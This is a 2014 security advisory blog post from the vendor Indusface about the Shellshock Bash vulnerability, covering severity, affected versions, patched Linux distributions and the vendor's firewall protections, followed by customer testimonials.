Thursday, September 25, 2014
Severity: The vulnerability has been rated as 10 for severity, meaning it is critical, and low for complexity, meaning it’s easy to be exploited by hackers.
Risk Assessment: Bash vulnerability is a critical threat to the web, and can be used by the attacker to execute remote commands in many common configurations. The severity of this is heightened by the fact that bash is the default configuration on most of the Linux servers, UNIX distributions and Mac OS. An attacker can execute command in affected servers, and even if these servers are not running with root vectors, they can in turn provide the attacker an important vector for further exploitation of the system. Bash is used by internet, email, and administration servers.
While bash is not directly used by remote users, it is used internally by popular software packages such as web, mail, and administration servers. In the case of a web server, a specially formatted web request, when passed by the web server to the bash application, can cause the bash software to run commands on the server for the attacker. This is an extremely serious issue and should be dealt with urgency.
Vulnerability: A critical vulnerability has been discovered in the Bourne again shell. It is present in Linux, UNIX and Mac OS. An environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe. Bash vulnerability is exploitable over network, if it is configured as system shell. It is expected that this exploit can be found lurking around in a lot of softwares. Routers, SCADA/ICS devices and medical equipments are likely to be exposed.
Risk Mitigation: This vulnerability is affecting version 1.14 through 4.3 of GNU Bash. Following are the patches that have been issued major Linux distribution vendors for affected versions:
• Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
• CentOS (versions 5 through 7)
• Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
Fix: All users of bash software package should upgrade at the earliest. Vendors have come up with patches which should be deployed at the earliest.
Indusface’s core rule set has an exhaustive protection for “command injection” category of vulnerabilities, those core rules already protected users against most of the Bash centric vulnerabilities. We have added few more signatures for various customer environments to ensure highest level of customized security for existing IndusGuard WAF customers.
Have You Read Our Blog How Not to Get BASH-ed
"Indusface has proved to be a valuable security partner with its Total Application Security solution. Their 'detect-protect-monitor' package handles security worries so we can focus on improving services for our customers. Vulnerability detection, attack blocking and near real-time reports are some of the key differentiators that we enjoy with them. The web application scanning and web protection combination ..."
"As one of the leading banks in India, securing application infrastructure is critical for us. Indusface’s Total Application Security package allows us to scan vulnerabilities continuously and prevent attacks. Indusface also provides the unique benefits of expert handling and tuning on custom rules with round-the-clock traffic monitoring and protection through on-premise appliances ..."
"Our complete ecommerce infrastructure is hosted on the cloud and we are glad to have Indusface as partner for web security. Due to their association with cloud service providers and prompt deployment options, Indusface was the preferred security choice. The on-demand and scheduled scanning helps us keep track of vulnerabilities that may otherwise damage our website or put customers at risk ..."